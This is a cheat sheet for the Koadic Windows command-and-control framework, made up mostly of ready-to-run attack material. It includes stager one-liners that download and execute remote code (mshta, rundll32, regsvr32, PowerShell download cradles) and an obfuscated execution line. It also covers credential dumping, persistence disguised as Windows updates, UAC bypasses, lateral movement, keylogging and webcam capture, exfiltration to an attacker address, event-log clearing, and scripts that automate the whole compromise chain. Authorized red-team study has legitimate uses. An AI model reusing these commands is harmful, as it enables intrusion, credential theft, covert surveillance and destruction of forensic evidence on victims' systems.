Koadic C2 Framework Cheat Sheet

Overview

Koadic is a Windows post-exploitation framework that leverages COM (Component Object Model) objects for command and control operations. Built in Python, Koadic focuses on living-off-the-land techniques, using legitimate Windows components and JavaScript execution to maintain persistence and avoid detection while providing comprehensive post-exploitation capabilities.

⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using against any target.

Installation

Prerequisites

# Install Python 3.6+ and pip
sudo apt update
sudo apt install -y python3 python3-pip git

# Install system dependencies
sudo apt install -y build-essential libssl-dev libffi-dev python3-dev

# Verify Python version
python3 --version

Installation from GitHub

# Clone Koadic repository
git clone https://github.com/zerosum0x0/koadic.git
cd koadic

# Install requirements
pip3 install -r requirements.txt

# Make executable
chmod +x koadic

Docker Installation

# Clone repository
git clone https://github.com/zerosum0x0/koadic.git
cd koadic

# Build Docker image
docker build -t koadic .

# Run Koadic container
docker run -it --rm -p 9999:9999 koadic

# Run with persistent data
docker run -it --rm -p 9999:9999 -v $(pwd)/data:/app/data koadic

Kali Linux Installation

# Install from Kali repositories
sudo apt update
sudo apt install koadic

# Or install from source
git clone https://github.com/zerosum0x0/koadic.git
cd koadic
pip3 install -r requirements.txt

Basic Usage

Starting Koadic

# Start Koadic
python3 koadic

# Start with specific interface
python3 koadic --ip 192.168.1.100

# Start with custom port
python3 koadic --port 8080

# Start in quiet mode
python3 koadic --quiet

Command Line Interface

# Koadic command prompt
(koadic: sta/js/mshta)#

# Get help
help

# Show available modules
show

# Use a module
use [module_path]

# Set module options
set [option] [value]

# Execute module
run

# Background current session
background

Basic Commands

# List available stagers
show stagers

# List available implants
show implants

# List active zombies (compromised hosts)
zombies

# Interact with zombie
zombie [zombie_id]

# Kill zombie
zombie [zombie_id] kill

Stagers and Implants

MSHTA Stager

# Use MSHTA stager
use stager/js/mshta

# Set options
set SRVHOST 192.168.1.100
set SRVPORT 9999
set ENDPOINT sales

# Generate stager
run

# Generated command
mshta http://192.168.1.100:9999/sales

# Execute on target
mshta.exe http://192.168.1.100:9999/sales

Rundll32 Stager

# Use Rundll32 stager
use stager/js/rundll32_js

# Set options
set SRVHOST 192.168.1.100
set SRVPORT 9999
set ENDPOINT update

# Generate stager
run

# Generated command
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.100:9999/update",false);h.Send();eval(h.ResponseText);window.close();

Regsvr32 Stager

# Use Regsvr32 stager
use stager/js/regsvr32

# Set options
set SRVHOST 192.168.1.100
set SRVPORT 9999
set ENDPOINT api

# Generate stager
run

# Generated command
regsvr32 /s /n /u /i:http://192.168.1.100:9999/api scrobj.dll

WScript Stager

# Use WScript stager
use stager/js/wscript

# Set options
set SRVHOST 192.168.1.100
set SRVPORT 9999
set ENDPOINT data

# Generate stager
run

# Generated command
wscript.exe //b //e:jscript \\192.168.1.100\share\payload.js

PowerShell Stager

# Use PowerShell stager
use stager/js/powershell

# Set options
set SRVHOST 192.168.1.100
set SRVPORT 9999
set ENDPOINT ps

# Generate stager
run

# Generated command
powershell.exe -exec bypass -window hidden -noni -nop -c "iex((new-object system.net.webclient).downloadstring('http://192.168.1.100:9999/ps'))"

Zombie Management

Basic Zombie Commands

# List all zombies
zombies

# Get zombie information
zombie [zombie_id] info

# Execute command on zombie
zombie [zombie_id] cmd "whoami"

# Execute PowerShell on zombie
zombie [zombie_id] shell "Get-Process"

# Kill zombie
zombie [zombie_id] kill

# Rename zombie
zombie [zombie_id] rename [new_name]

Zombie Interaction

# Interact with specific zombie
zombie [zombie_id]

# Once in zombie context
whoami                  # Current user
hostname                # Computer name
pwd                     # Current directory
ls                      # List directory
cd [path]               # Change directory
cat [file]              # Read file
download [file]         # Download file
upload [local] [remote] # Upload file

Multi-Zombie Operations

# Execute command on all zombies
zombies cmd "systeminfo"

# Execute on specific zombies
zombies 1,3,5 cmd "whoami"

# Execute PowerShell on all zombies
zombies shell "Get-ComputerInfo"

# Kill all zombies
zombies kill

Implant Modules

System Information

# Get system information
use implant/gather/enum_system
set ZOMBIE [zombie_id]
run

# Enumerate users
use implant/gather/enum_users
set ZOMBIE [zombie_id]
run

# Enumerate processes
use implant/gather/enum_process
set ZOMBIE [zombie_id]
run

# Enumerate services
use implant/gather/enum_services
set ZOMBIE [zombie_id]
run

Credential Harvesting

# Dump credentials with Mimikatz
use implant/gather/mimikatz
set ZOMBIE [zombie_id]
set COMMAND sekurlsa::logonpasswords
run

# Dump SAM database
use implant/gather/hashdump
set ZOMBIE [zombie_id]
run

# Enumerate stored credentials
use implant/gather/enum_creds
set ZOMBIE [zombie_id]
run

# Browser credential extraction
use implant/gather/enum_chrome
set ZOMBIE [zombie_id]
run

Persistence Mechanisms

# Registry persistence
use implant/persist/registry
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
set HIVE HKCU
set KEY "Software\Microsoft\Windows\CurrentVersion\Run"
set VALUE "WindowsUpdate"
run

# Scheduled task persistence
use implant/persist/schtasks
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
set TASKNAME "SystemUpdate"
set TRIGGER "ONLOGON"
run

# Service persistence
use implant/persist/service
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
set SERVICENAME "WindowsUpdateService"
run

# WMI persistence
use implant/persist/wmi
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
set FILTERNAME "ProcessFilter"
set CONSUMERNAME "ProcessConsumer"
run

Lateral Movement

# WMI execution
use implant/lateral/wmi
set ZOMBIE [zombie_id]
set TARGET 192.168.1.100
set USERNAME administrator
set PASSWORD password123
set COMMAND "whoami"
run

# PSExec execution
use implant/lateral/psexec
set ZOMBIE [zombie_id]
set TARGET 192.168.1.100
set USERNAME admin
set PASSWORD pass123
set COMMAND "systeminfo"
run

# PowerShell remoting
use implant/lateral/winrm
set ZOMBIE [zombie_id]
set TARGET 192.168.1.100
set USERNAME administrator
set PASSWORD password123
set COMMAND "Get-Process"
run

# SMB execution
use implant/lateral/smb
set ZOMBIE [zombie_id]
set TARGET 192.168.1.100
set SHARE C$
set USERNAME admin
set PASSWORD pass123
set COMMAND "dir"
run

Privilege Escalation

# UAC bypass techniques
use implant/elevate/bypassuac_eventvwr
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
run

use implant/elevate/bypassuac_fodhelper
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
run

use implant/elevate/bypassuac_computerdefaults
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
run

# Token manipulation
use implant/elevate/token_steal
set ZOMBIE [zombie_id]
set PID [target_pid]
run

# Service exploitation
use implant/elevate/service_unquoted
set ZOMBIE [zombie_id]
run

Network Operations

# Port scanning
use implant/scan/tcp
set ZOMBIE [zombie_id]
set RHOSTS 192.168.1.0/24
set RPORTS 80,443,22,3389
run

# Network discovery
use implant/gather/enum_network
set ZOMBIE [zombie_id]
run

# ARP scanning
use implant/scan/arp
set ZOMBIE [zombie_id]
set NETWORK 192.168.1.0/24
run

# SMB enumeration
use implant/gather/enum_shares
set ZOMBIE [zombie_id]
set TARGET 192.168.1.100
run

File Operations

# File search
use implant/gather/file_search
set ZOMBIE [zombie_id]
set PATH C:\Users
set PATTERN *.docx
run

# Directory listing
use implant/gather/dir_list
set ZOMBIE [zombie_id]
set PATH C:\Users\Administrator\Documents
run

# File download
use implant/gather/download
set ZOMBIE [zombie_id]
set RPATH C:\Users\Administrator\Documents\sensitive.docx
set LPATH ./downloads/sensitive.docx
run

# File upload
use implant/manage/upload
set ZOMBIE [zombie_id]
set LPATH ./payloads/tool.exe
set RPATH C:\Windows\Temp\tool.exe
run

Advanced Features

Pivoting and Tunneling

# SOCKS proxy
use implant/pivot/socks
set ZOMBIE [zombie_id]
set LPORT 1080
run

# Port forwarding
use implant/pivot/portfwd
set ZOMBIE [zombie_id]
set LPORT 8080
set RHOST 192.168.1.100
set RPORT 80
run

# Reverse port forwarding
use implant/pivot/rportfwd
set ZOMBIE [zombie_id]
set LPORT 3389
set RHOST 127.0.0.1
set RPORT 3389
run

Keylogging and Screen Capture

# Start keylogger
use implant/gather/keylogger
set ZOMBIE [zombie_id]
set DURATION 300
run

# Screen capture
use implant/gather/screenshot
set ZOMBIE [zombie_id]
run

# Webcam capture
use implant/gather/webcam
set ZOMBIE [zombie_id]
run

# Audio recording
use implant/gather/microphone
set ZOMBIE [zombie_id]
set DURATION 60
run

Data Exfiltration

# HTTP exfiltration
use implant/exfil/http
set ZOMBIE [zombie_id]
set LPATH C:\Users\Administrator\Documents\data.zip
set URL http://192.168.1.100:8080/upload
run

# DNS exfiltration
use implant/exfil/dns
set ZOMBIE [zombie_id]
set LPATH C:\sensitive\data.txt
set DOMAIN exfil.example.com
run

# Email exfiltration
use implant/exfil/email
set ZOMBIE [zombie_id]
set LPATH C:\data\sensitive.docx
set SMTP smtp.gmail.com
set USERNAME user@gmail.com
set PASSWORD password123
set RECIPIENT attacker@evil.com
run

Automation and Scripting

Python Automation Script

#!/usr/bin/env python3
# Koadic automation script

import time
import subprocess
import json
import os

class KoadicAutomation:
    def __init__(self, koadic_path="./koadic"):
        self.koadic_path = koadic_path
        self.zombies = []
    
    def execute_command(self, command):
        """Execute Koadic command"""
        try:
            result = subprocess.run([
                "python3", self.koadic_path, 
                "-c", command
            ], capture_output=True, text=True, timeout=30)
            return result.stdout
        except subprocess.TimeoutExpired:
            return "Command timed out"
        except Exception as e:
            return f"Error: {str(e)}"
    
    def setup_listener(self, host="192.168.1.100", port=9999):
        """Setup MSHTA listener"""
        commands = [
            "use stager/js/mshta",
            f"set SRVHOST {host}",
            f"set SRVPORT {port}",
            "set ENDPOINT sales",
            "run"
        ]
        
        for cmd in commands:
            print(f"[+] Executing: {cmd}")
            result = self.execute_command(cmd)
            time.sleep(1)
        
        print(f"[+] Listener setup complete")
        print(f"[+] Execute on target: mshta http://{host}:{port}/sales")
    
    def get_zombies(self):
        """Get list of active zombies"""
        result = self.execute_command("zombies")
        # Parse zombie list from output
        # Implementation depends on output format
        return self.zombies
    
    def automated_recon(self, zombie_id):
        """Perform automated reconnaissance"""
        modules = [
            "implant/gather/enum_system",
            "implant/gather/enum_users", 
            "implant/gather/enum_process",
            "implant/gather/enum_services",
            "implant/gather/enum_network"
        ]
        
        for module in modules:
            commands = [
                f"use {module}",
                f"set ZOMBIE {zombie_id}",
                "run"
            ]
            
            for cmd in commands:
                print(f"[+] Executing: {cmd}")
                result = self.execute_command(cmd)
                time.sleep(2)
    
    def credential_harvesting(self, zombie_id):
        """Harvest credentials from zombie"""
        modules = [
            ("implant/gather/mimikatz", "sekurlsa::logonpasswords"),
            ("implant/gather/hashdump", ""),
            ("implant/gather/enum_creds", ""),
            ("implant/gather/enum_chrome", "")
        ]
        
        for module, command in modules:
            commands = [
                f"use {module}",
                f"set ZOMBIE {zombie_id}"
            ]
            
            if command:
                commands.append(f"set COMMAND {command}")
            
            commands.append("run")
            
            for cmd in commands:
                print(f"[+] Executing: {cmd}")
                result = self.execute_command(cmd)
                time.sleep(3)
    
    def establish_persistence(self, zombie_id):
        """Establish persistence on zombie"""
        persistence_modules = [
            ("implant/persist/registry", {
                "HIVE": "HKCU",
                "KEY": "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                "VALUE": "WindowsUpdate",
                "PAYLOAD": "C:\\Windows\\Temp\\update.exe"
            }),
            ("implant/persist/schtasks", {
                "TASKNAME": "SystemUpdate",
                "TRIGGER": "ONLOGON",
                "PAYLOAD": "C:\\Windows\\Temp\\update.exe"
            })
        ]
        
        for module, options in persistence_modules:
            commands = [
                f"use {module}",
                f"set ZOMBIE {zombie_id}"
            ]
            
            for key, value in options.items():
                commands.append(f"set {key} {value}")
            
            commands.append("run")
            
            for cmd in commands:
                print(f"[+] Executing: {cmd}")
                result = self.execute_command(cmd)
                time.sleep(2)
    
    def lateral_movement(self, zombie_id, targets):
        """Perform lateral movement"""
        for target in targets:
            modules = [
                ("implant/lateral/wmi", {
                    "TARGET": target,
                    "USERNAME": "administrator",
                    "PASSWORD": "password123",
                    "COMMAND": "whoami"
                }),
                ("implant/lateral/psexec", {
                    "TARGET": target,
                    "USERNAME": "admin",
                    "PASSWORD": "pass123",
                    "COMMAND": "systeminfo"
                })
            ]
            
            for module, options in modules:
                commands = [
                    f"use {module}",
                    f"set ZOMBIE {zombie_id}"
                ]
                
                for key, value in options.items():
                    commands.append(f"set {key} {value}")
                
                commands.append("run")
                
                for cmd in commands:
                    print(f"[+] Executing: {cmd}")
                    result = self.execute_command(cmd)
                    time.sleep(3)

# Usage example
def main():
    automation = KoadicAutomation()
    
    # Setup listener
    automation.setup_listener("192.168.1.100", 9999)
    
    # Wait for zombies to connect
    print("[+] Waiting for zombies to connect...")
    time.sleep(60)
    
    # Get active zombies
    zombies = automation.get_zombies()
    
    for zombie_id in zombies:
        print(f"[+] Processing zombie: {zombie_id}")
        
        # Perform reconnaissance
        automation.automated_recon(zombie_id)
        
        # Harvest credentials
        automation.credential_harvesting(zombie_id)
        
        # Establish persistence
        automation.establish_persistence(zombie_id)
        
        # Lateral movement
        targets = ["192.168.1.101", "192.168.1.102"]
        automation.lateral_movement(zombie_id, targets)

if __name__ == "__main__":
    main()

PowerShell Automation

# Koadic PowerShell automation script

function Invoke-KoadicAutomation {
    param(
        [string]$KoadicPath = "./koadic",
        [string]$ListenerHost = "192.168.1.100",
        [int]$ListenerPort = 9999
    )
    
    function Execute-KoadicCommand {
        param([string]$Command)
        
        try {
            $result = & python3 $KoadicPath -c $Command 2>&1
            return $result
        }
        catch {
            Write-Warning "Failed to execute command: $Command"
            return $null
        }
    }
    
    # Setup MSHTA listener
    Write-Host "[+] Setting up MSHTA listener..."
    $commands = @(
        "use stager/js/mshta",
        "set SRVHOST $ListenerHost",
        "set SRVPORT $ListenerPort",
        "set ENDPOINT sales",
        "run"
    )
    
    foreach ($cmd in $commands) {
        Write-Host "[+] Executing: $cmd"
        Execute-KoadicCommand -Command $cmd
        Start-Sleep -Seconds 1
    }
    
    Write-Host "[+] Listener setup complete"
    Write-Host "[+] Execute on target: mshta http://$ListenerHost`:$ListenerPort/sales"
    
    # Wait for zombies
    Write-Host "[+] Waiting for zombies to connect..."
    Start-Sleep -Seconds 60
    
    # Get zombie list (simplified - would need proper parsing)
    $zombieResult = Execute-KoadicCommand -Command "zombies"
    
    # Process each zombie (example with zombie ID 0)
    $zombieId = 0
    
    Write-Host "[+] Processing zombie: $zombieId"
    
    # Reconnaissance modules
    $reconModules = @(
        "implant/gather/enum_system",
        "implant/gather/enum_users",
        "implant/gather/enum_process",
        "implant/gather/enum_services"
    )
    
    foreach ($module in $reconModules) {
        Write-Host "[+] Running module: $module"
        Execute-KoadicCommand -Command "use $module"
        Execute-KoadicCommand -Command "set ZOMBIE $zombieId"
        Execute-KoadicCommand -Command "run"
        Start-Sleep -Seconds 3
    }
    
    # Credential harvesting
    Write-Host "[+] Harvesting credentials..."
    $credModules = @(
        @{Module = "implant/gather/mimikatz"; Command = "sekurlsa::logonpasswords"},
        @{Module = "implant/gather/hashdump"; Command = ""},
        @{Module = "implant/gather/enum_creds"; Command = ""}
    )
    
    foreach ($item in $credModules) {
        Write-Host "[+] Running module: $($item.Module)"
        Execute-KoadicCommand -Command "use $($item.Module)"
        Execute-KoadicCommand -Command "set ZOMBIE $zombieId"
        if ($item.Command) {
            Execute-KoadicCommand -Command "set COMMAND $($item.Command)"
        }
        Execute-KoadicCommand -Command "run"
        Start-Sleep -Seconds 5
    }
    
    # Establish persistence
    Write-Host "[+] Establishing persistence..."
    Execute-KoadicCommand -Command "use implant/persist/registry"
    Execute-KoadicCommand -Command "set ZOMBIE $zombieId"
    Execute-KoadicCommand -Command "set HIVE HKCU"
    Execute-KoadicCommand -Command "set KEY Software\Microsoft\Windows\CurrentVersion\Run"
    Execute-KoadicCommand -Command "set VALUE WindowsUpdate"
    Execute-KoadicCommand -Command "set PAYLOAD C:\Windows\Temp\update.exe"
    Execute-KoadicCommand -Command "run"
    
    Write-Host "[+] Automation completed"
}

# Execute automation
Invoke-KoadicAutomation -ListenerHost "192.168.1.100" -ListenerPort 9999

Bash Automation Script

#!/bin/bash
# Koadic bash automation script

KOADIC_PATH="./koadic"
LISTENER_HOST="192.168.1.100"
LISTENER_PORT="9999"

# Function to execute Koadic commands
execute_koadic_command() {
    local command="$1"
    echo "[+] Executing: $command"
    python3 "$KOADIC_PATH" -c "$command"
    sleep 1
}

# Setup MSHTA listener
echo "[+] Setting up MSHTA listener..."
execute_koadic_command "use stager/js/mshta"
execute_koadic_command "set SRVHOST $LISTENER_HOST"
execute_koadic_command "set SRVPORT $LISTENER_PORT"
execute_koadic_command "set ENDPOINT sales"
execute_koadic_command "run"

echo "[+] Listener setup complete"
echo "[+] Execute on target: mshta http://$LISTENER_HOST:$LISTENER_PORT/sales"

# Wait for zombies
echo "[+] Waiting for zombies to connect..."
sleep 60

# Process zombie (example with zombie ID 0)
ZOMBIE_ID=0
echo "[+] Processing zombie: $ZOMBIE_ID"

# Reconnaissance
echo "[+] Performing reconnaissance..."
recon_modules=(
    "implant/gather/enum_system"
    "implant/gather/enum_users"
    "implant/gather/enum_process"
    "implant/gather/enum_services"
    "implant/gather/enum_network"
)

for module in "${recon_modules[@]}"; do
    echo "[+] Running module: $module"
    execute_koadic_command "use $module"
    execute_koadic_command "set ZOMBIE $ZOMBIE_ID"
    execute_koadic_command "run"
    sleep 3
done

# Credential harvesting
echo "[+] Harvesting credentials..."
execute_koadic_command "use implant/gather/mimikatz"
execute_koadic_command "set ZOMBIE $ZOMBIE_ID"
execute_koadic_command "set COMMAND sekurlsa::logonpasswords"
execute_koadic_command "run"
sleep 5

execute_koadic_command "use implant/gather/hashdump"
execute_koadic_command "set ZOMBIE $ZOMBIE_ID"
execute_koadic_command "run"
sleep 5

# Establish persistence
echo "[+] Establishing persistence..."
execute_koadic_command "use implant/persist/registry"
execute_koadic_command "set ZOMBIE $ZOMBIE_ID"
execute_koadic_command "set HIVE HKCU"
execute_koadic_command "set KEY Software\\Microsoft\\Windows\\CurrentVersion\\Run"
execute_koadic_command "set VALUE WindowsUpdate"
execute_koadic_command "set PAYLOAD C:\\Windows\\Temp\\update.exe"
execute_koadic_command "run"

execute_koadic_command "use implant/persist/schtasks"
execute_koadic_command "set ZOMBIE $ZOMBIE_ID"
execute_koadic_command "set TASKNAME SystemUpdate"
execute_koadic_command "set TRIGGER ONLOGON"
execute_koadic_command "set PAYLOAD C:\\Windows\\Temp\\update.exe"
execute_koadic_command "run"

echo "[+] Automation completed"

Integration with Other Tools

Metasploit Integration

# Use Koadic for initial access, pivot to Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe

# Upload via Koadic zombie
use implant/manage/upload
set ZOMBIE [zombie_id]
set LPATH ./meterpreter.exe
set RPATH C:\Windows\Temp\update.exe
run

# Execute Metasploit payload
zombie [zombie_id] cmd "C:\Windows\Temp\update.exe"

# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
run

Empire Integration

# Generate Empire stager
# Use Koadic for initial access, pivot to Empire

# From Koadic zombie
zombie [zombie_id] shell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"

# Handle in Empire
./empire
listeners
uselistener http
set Host 192.168.1.100
set Port 8080
execute

Cobalt Strike Integration

# Beacon integration
# Generate Cobalt Strike beacon
# Use Koadic for initial access, pivot to Beacon

# From Koadic zombie
zombie [zombie_id] shell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"

# Handle in Cobalt Strike team server

Operational Security

Communication Security

# Use HTTPS with valid certificates
# Configure domain fronting
# Implement certificate pinning
# Use legitimate user agents

# Example HTTPS configuration
# Generate SSL certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

# Configure Koadic with SSL (if supported)
# Use reverse proxy with SSL termination

Traffic Obfuscation

# Use legitimate Windows binaries
# Implement jitter and delays
# Mimic legitimate traffic patterns
# Use common ports and protocols

# Example obfuscated execution
mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command """"& {Start-Sleep -Seconds (Get-Random -Minimum 5 -Maximum 30); IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100:9999/sales')}"""", 0, False")(window.close)

Anti-Forensics

# Clear event logs
zombie [zombie_id] cmd "wevtutil cl System"
zombie [zombie_id] cmd "wevtutil cl Security"
zombie [zombie_id] cmd "wevtutil cl Application"

# Clear PowerShell history
zombie [zombie_id] shell "Remove-Item (Get-PSReadlineOption).HistorySavePath -Force"

# Timestomping
zombie [zombie_id] shell "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"

Troubleshooting

Common Issues

# Zombie not connecting
1. Check firewall rules
2. Verify listener configuration
3. Test network connectivity
4. Check antivirus interference

# Python dependency issues
pip3 install --upgrade -r requirements.txt

# Module execution failures
# Check zombie status
zombies

# Verify module options
show options

Debug Mode

# Enable verbose logging
python3 koadic --verbose

# Check network connectivity
telnet 192.168.1.100 9999

# Test stager execution
mshta http://192.168.1.100:9999/sales

Best Practices

Operational Planning

1. Pre-engagement setup: Configure stagers and listeners before engagement
2. Zombie management: Use descriptive zombie names and organize by network
3. Communication protocols: Establish secure C2 communication channels
4. Data handling: Implement secure data collection and storage
5. Cleanup procedures: Plan for artifact removal and zombie cleanup

Security Considerations

# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates

# Zombie management
# Use unique zombie identifiers
# Implement zombie timeouts
# Regular zombie rotation
# Secure communication channels

Documentation and Reporting

# Operation documentation
# Maintain zombie logs
# Document all activities
# Track compromised systems
# Generate executive reports

# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution prevention

Resources

• Koadic GitHub Repository
• Koadic Documentation
• Living Off The Land Binaries
• MITRE ATT&CK Framework
• SANS Red Team Operations

---

This cheat sheet provides a comprehensive reference for using Koadic C2 framework. Always ensure you have proper authorization before conducting red team operations or penetration testing.